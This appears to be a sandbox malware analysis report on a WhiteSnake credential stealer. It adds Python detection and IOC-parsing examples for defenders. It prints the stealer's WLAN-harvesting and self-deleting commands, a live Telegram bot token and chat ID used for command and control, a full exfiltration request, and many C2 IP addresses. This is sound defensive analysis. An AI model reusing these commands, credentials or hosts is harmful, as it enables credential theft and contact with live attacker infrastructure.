Windows Analysis Report
BA9qyj2c9G.exe

Overview

General Information

Sample name: BA9qyj2c9G.exe (renamed because the original name is a hash value)
Original sample name: C9495B3A992EA3E2EF2788C7BA7ED840.exe
Analysis ID: 1570929
MD5: c9495b3a992ea3e2ef2788c7ba7ed840
SHA1: 3d2e2ff99cd28f81a906d8d928ad7d42ff5226be
SHA256: 3398ed7cffcc75371d831fda315805c714268c321c863f60c806ae73cfaae4cd
Tags: exe, WhiteSnakeStealer, user-abuse_ch

Detection

WhiteSnake Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • BA9qyj2c9G.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\BA9qyj2c9G.exe" MD5: C9495B3A992EA3E2EF2788C7BA7ED840)
    • cmd.exe (PID: 7664 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7868 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 8000 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 8036 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 8120 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8168 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 8180 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 8188 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7256 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8156 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 5596 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
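The tree above shows the two behaviours worth alerting on: cmd.exe spawned from a user-profile path that runs netsh wlan show profiles / show networks through findstr, and a delayed DEL of the parent's own executable. The detection logic below is an added example written for this page, not code from Joe Sandbox or from the report. It runs over constructed process-creation events: the four malicious command lines are copied from the tree, while the parent of the top process and the two benign events at the end are invented for contrast. It goes slightly beyond the capture by also escalating on key=clear, the netsh flag that prints the stored passphrase, which does not appear in this tree.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events modelled on the process tree in the report.
# The four malicious command lines are copied verbatim; the parent of PID 7496 and
# the two benign events (PIDs 4321, 4322) are invented for contrast.
EVENTS = [
    {"pid": 7496, "image": r"C:\Users\user\Desktop\BA9qyj2c9G.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\user\Desktop\BA9qyj2c9G.exe"'},
    {"pid": 7664, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\user\Desktop\BA9qyj2c9G.exe",
     "cmdline": r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'},
    {"pid": 8120, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\user\Desktop\BA9qyj2c9G.exe",
     "cmdline": r'"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"'},
    {"pid": 7256, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\user\Desktop\BA9qyj2c9G.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"'},
    # benign (invented): an administrator listing profiles from an interactive console
    {"pid": 4321, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"cmd.exe" /c netsh wlan show profiles'},
    # benign (invented): a script deleting a file that is not its own parent binary
    {"pid": 4322, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'cmd.exe /c DEL /Q "C:\Temp\old.log"'},
]

WLAN_RE = re.compile(r"netsh(?:\.exe)?\s+wlan\s+show\s+(profiles?|networks)", re.I)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.I)          # cleartext passphrase request
PIPED_RE = re.compile(r"\|\s*(findstr|find)\b", re.I)             # output filtered, i.e. scripted
DELAY_RE = re.compile(r"\b(timeout\s+/t\s+\d+|ping\s+(-n|/n)\s+\d+)\b", re.I)
DEL_TARGET_RE = re.compile(r'\b(?:del|erase)\b[^"&|]*"([^"]+)"', re.I)
USER_WRITABLE_RE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)


@dataclass
class Finding:
    pid: int
    rule: str
    severity: str
    reasons: list = field(default_factory=list)


def detect_wlan_harvest(ev):
    """Flag netsh wlan enumeration; escalate when the output is piped through
    findstr, when key=clear is requested, or when the parent binary runs from a
    user-writable path, as BA9qyj2c9G.exe does in the report."""
    m = WLAN_RE.search(ev["cmdline"])
    if not m:
        return None
    severity, reasons = "low", [f"netsh wlan show {m.group(1).lower()}"]
    if PIPED_RE.search(ev["cmdline"]):
        severity = "medium"
        reasons.append("output filtered through findstr (scripted collection, not interactive use)")
    if KEY_CLEAR_RE.search(ev["cmdline"]):
        severity = "high"
        reasons.append("key=clear requests the stored passphrase")
    if USER_WRITABLE_RE.search(ev["parent_image"]):
        severity = "high"
        reasons.append(f"parent runs from a user-writable path: {ev['parent_image']}")
    return Finding(ev["pid"], "wlan_profile_harvest", severity, reasons)


def detect_self_delete(ev):
    """Flag a cmd.exe whose DEL target is the executable of its own parent process."""
    m = DEL_TARGET_RE.search(ev["cmdline"])
    if not m:
        return None
    target = m.group(1)
    if target.lower() != ev["parent_image"].lower():
        return None
    reasons = [f"deletes parent executable {target}"]
    if DELAY_RE.search(ev["cmdline"]):
        reasons.append("delay before DEL, so the parent can exit and release its file lock")
    return Finding(ev["pid"], "self_delete", "high", reasons)


def scan(events):
    """Run every detector over every event and return the findings in event order."""
    findings = []
    for ev in events:
        for detector in (detect_wlan_harvest, detect_self_delete):
            f = detector(ev)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"{f.severity:6} pid={f.pid} {f.rule}: " + "; ".join(f.reasons))
```

The self-deletion check compares the DEL target with the parent image rather than looking for a fixed command string, so it also fires when the delay is done with ping or the path differs; the WLAN rule keeps an interactive, console-launched netsh at low severity so that the findstr pipeline and the user-profile parent carry the weight of the alert.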
{"C2 url": "https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage"}

Yara matches

Source | Rule | Description | Author
00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security
Process Memory Space: BA9qyj2c9G.exe PID: 7496 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: BA9qyj2c9G.exe PID: 7496 | JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security
Process Memory Space: BA9qyj2c9G.exe PID: 7496 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 209.38.221.184, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\BA9qyj2c9G.exe, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\BA9qyj2c9G.exe", ParentImage: C:\Users\user\Desktop\BA9qyj2c9G.exe, ParentProcessId: 7496, ParentProcessName: BA9qyj2c9G.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7664, ProcessName: cmd.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T13:01:57.052726+0100 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.4 | 49731 | 209.38.221.184 | 8080 | TCP
2024-12-08T13:01:59.080774+0100 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.4 | 49732 | 46.235.26.83 | 8080 | TCP
2024-12-08T13:02:02.956808+0100 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.4 | 49733 | 147.28.185.29 | 80 | TCP
2024-12-08T13:02:04.960666+0100 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.4 | 49734 | 206.166.251.4 | 8080 | TCP
2024-12-08T13:02:26.972752+0100 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.4 | 49741 | 51.159.4.50 | 8080 | TCP

AV Detection

Source: BA9qyj2c9G.exe | Avira: detected
Source: BA9qyj2c9G.exe.7496.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage"}
Source: BA9qyj2c9G.exe | ReversingLabs: Detection: 68%
Source: BA9qyj2c9G.exe | Virustotal: Detection: 66%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: BA9qyj2c9G.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B727A11 CryptUnprotectData | 0_2_00007FFD9B727A11
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 0_2_00007FFD9B727B5D CryptUnprotectData | 0_2_00007FFD9B727B5D
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: BA9qyj2c9G.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then dec eax | 0_2_00007FFD9B72229A
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B731651h | 0_2_00007FFD9B72EFEA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B730A02h | 0_2_00007FFD9B72EFEA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B730BF9h | 0_2_00007FFD9B72EFEA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B724774h | 0_2_00007FFD9B723F81
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B735F6Dh | 0_2_00007FFD9B735D53
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B741664h | 0_2_00007FFD9B7414AA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B731651h | 0_2_00007FFD9B731269
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B726C8Ch | 0_2_00007FFD9B726A89
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B7373DAh | 0_2_00007FFD9B7372C5
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B726C8Ch | 0_2_00007FFD9B7249DB
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B731651h | 0_2_00007FFD9B7300EA
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then dec eax | 0_2_00007FFD9B733FBF
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B724748h | 0_2_00007FFD9B7246D4
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then dec eax | 0_2_00007FFD9B73162D
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B731651h | 0_2_00007FFD9B730D7E
Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Code function: 4x nop then jmp 00007FFD9B7381F1h | 0_2_00007FFD9B737D21

Networking

Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49731 -> 209.38.221.184:8080
Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49741 -> 51.159.4.50:8080
Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49734 -> 206.166.251.4:8080
Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49732 -> 46.235.26.83:8080
Source: Network traffic | Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.4:49733 -> 147.28.185.29:80
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 209.38.221.184:8080
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 46.235.26.83:8080
Source: global traffic | TCP traffic: 192.168.2.4:49734 -> 206.166.251.4:8080
Source: global traffic | TCP traffic: 192.168.2.4:49741 -> 51.159.4.50:8080
Source: global traffic | HTTP traffic detected: GET /bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | ASN Name: ATT-INTERNET4US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 209.38.221.184 (reported 18 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 46.235.26.83 (reported 22 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 147.28.185.29 (reported 10 times)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
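The sendMessage request recorded above carries everything an analyst needs in one URL: the operator's bot token and chat_id in the path and query, the victim summary as percent-encoded HTML in text=, and the report download URL inside the reply_markup inline keyboard. The parser below is an added example written for this page (not Joe Sandbox code and not the stealer's), using only the Python standard library. It takes the request as recorded (request path and query joined to the Host header it was sent with) and returns the fields worth pivoting on. Unwrapping the Open button's loopback URL through its r= parameter is an assumption drawn from the shape of that URL as captured here.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# The request line from the report's Networking section, prefixed with the scheme and the
# Host header value it was sent with (api.telegram.org over TLS).
TELEGRAM_URL = (
    "https://api.telegram.org"
    "/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage"
    "?chat_id=-4568449403"
    "&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A"
    "%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A"
    "%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A"
    "&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C"
    "%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D"
    "&parse_mode=HTML"
)

# Bot API paths look like /bot<numeric id>:<secret>/<method>; the numeric id identifies the bot
# even after the secret is rotated, so both halves are returned separately.
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d+:[\w-]+)/(?P<method>\w+)$")
# The message body is HTML: "<b>Key:</b> <i>value</i>" per line, or "<b>Key:</b> value" (Report size).
FIELD_RE = re.compile(r"<b>([^<]+?):</b>\s*(?:<i>([^<]*)</i>|([^\n<]*))")


def unwrap_button_url(url):
    """The 'Open' button points at a loopback handler (127.0.0.1:18772/handleOpenWSR) whose r=
    parameter carries the real report URL; return that inner URL, otherwise the URL unchanged.
    Assumption drawn from the captured request, not from documented WhiteSnake behaviour."""
    parts = urlsplit(url)
    if parts.hostname in ("127.0.0.1", "localhost"):
        inner = parse_qs(parts.query).get("r")
        if inner:
            return inner[0]
    return url


def parse_telegram_exfil(url):
    """Decode a WhiteSnake-style Telegram sendMessage exfiltration URL into IOC fields."""
    parts = urlsplit(url)
    m = BOT_PATH_RE.match(parts.path)
    if parts.hostname != "api.telegram.org" or not m:
        raise ValueError("not a Telegram Bot API request")
    q = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes every value
    text = q.get("text", [""])[0]
    fields = {k: (i or plain).strip() for k, i, plain in FIELD_RE.findall(text)}
    tag = text.split()[0] if text.strip() else ""      # leading hashtag label, e.g. #CRYPTOMAINER

    report_urls, hosts = [], set()
    markup = json.loads(q["reply_markup"][0]) if "reply_markup" in q else {}
    for row in markup.get("inline_keyboard", []):
        for button in row:
            if "url" not in button:
                continue
            real = unwrap_button_url(button["url"])
            if real not in report_urls:
                report_urls.append(real)
            p = urlsplit(real)
            hosts.add(f"{p.hostname}:{p.port or (443 if p.scheme == 'https' else 80)}")

    return {
        "bot_id": m.group("token").split(":")[0],
        "token": m.group("token"),
        "method": m.group("method"),
        "chat_id": q.get("chat_id", [""])[0],
        "tag": tag,
        "victim": fields,
        "report_urls": report_urls,
        "hosts": hosts,
    }


if __name__ == "__main__":
    result = parse_telegram_exfil(TELEGRAM_URL)
    for key, value in result.items():
        print(f"{key:12} {value}")
```

Both keyboard buttons resolve to the same .wsr download on 51.159.4.50:8080, which is the only keyboard URL that ever leaves the victim network; the Open button targets a loopback address and is inert on the victim side. Treat the bot token as a credential for the attacker's channel, and carry bot_id and chat_id into the IOC set alongside the host:port list, since they survive a change of report-hosting server.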
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://101.126.19.171:80
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://101.43.160.136:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://107.161.20.142:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://116.202.101.219:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://129.151.109.160:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://132.145.17.167:9090
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29:80
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29:80/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29:80/yrABY_user
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.28.185.29:80/yrABY_user%40841618_report.wsr
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://159.203.174.113:8090
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://167.235.70.96:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://168.138.211.88:8099
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://18.228.80.130:80
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:80
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.217.98.121:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.164.198.113:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.78.55.47:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4:8080
Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://206.166.251.4:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%7
